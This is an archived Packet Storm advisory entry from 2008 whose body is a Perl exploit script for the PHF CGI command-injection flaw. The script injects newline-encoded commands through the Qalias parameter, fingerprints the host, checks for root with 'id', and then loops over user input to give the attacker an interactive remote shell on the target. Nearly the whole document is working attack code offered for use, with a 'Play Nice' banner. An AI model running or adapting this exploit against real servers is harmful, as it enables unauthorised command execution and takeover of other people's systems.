New Twist On The Old PHF Vulnerability

2008-12-30T00:00:00
ID PACKETSTORM:73320
Type packetstorm
Reporter Oxagast
Modified 2008-12-30T00:00:00

Description

                                        
                                            `#!/usr/bin/perl  
  
# greets to josh arielle matt carley  
  
use WWW::Mechanize;  
if (scalar(@ARGV) < 1) {  
print "\n --=== PHF00z3 by Oxagast ===--\n\n";  
print " useage: ./$0 hostname\n\n";  
print " Play Nice :)\n";  
exit();  
}  
$scrape = WWW::Mechanize->new(timeout => 3);  
print "Connecting...\n";  
print "Checking if exploitable...\n";  
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Auname%20-a");  
$unamea = $scrape->content();  
@unameafeed = split(/\n/, $unamea);  
for $stupidpres (0..scalar(@unameafeed)) {  
if (@unameafeed[$stupidpres] =~ m/<PRE>/) {  
$realunamea = @unameafeed[$stupidpres+1];  
}  
}  
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Ash%20--version");  
$shver = $scrape->content();  
@shverfeed = split(/\n/, $shver);  
for $stupidpres (0..scalar(@shverfeed)) {  
if (@shverfeed[$stupidpres] =~ m/<PRE>/) {  
@shverfeed[$stupidpres+1] =~ m/version (\d+\.\d)/;  
if ($1 ne "") {  
$realshver = "sh-$1";  
}  
}  
}  
$scrape->get("http://@ARGV[0]/cgi-bin/phf?Qalias=%0Als%20%20/bin");  
$scraped = $scrape->content();  
if($scraped =~ /chmod/m) {  
if($scraped =~ /mkdir/m) {  
if($scraped =~ /stty/m) {  
$startup = 1;  
$rootus = 0;  
while (0 < 1) {  
if ($startup == 1) {  
$cmd = "id";  
  
}  
if ($startup == 0) {  
if ($rootus == 0) {  
print "$realshver\$ ";  
}  
if ($rootus == 1) {  
print "$realshver\# ";  
}  
$cmd = <STDIN>;  
}  
$scrape->get("http:\/\/@ARGV[0]/cgi-bin/phf?Qalias=%0A$cmd");  
$scraped = $scrape->content();  
@feedback = split(/\n/, $scraped);  
for $line (0..scalar(@feedback)) {  
if (@feedback[$line] eq "<PRE>") {  
$outs = $line + 1;  
}  
}  
for $outline ($outs..scalar(@feedback)-2) {  
if ($startup == 1) {  
if (@feedback[$outline] =~ /\(root\)/) {  
print "OOooooo now look what we have here... :P r00t\n";  
print "$realunamea\n";  
$rootus = 1;  
}  
else {  
print "We got ourselves a shell... :)\n";  
print "$realunamea\n";  
}  
}  
print "@feedback[$outline]\n";  
$startup = 0;  
}  
}  
}  
}  
}  
  
else {  
print "OOps, doesn't look like she's vulnerable. :(\n";  
}  
`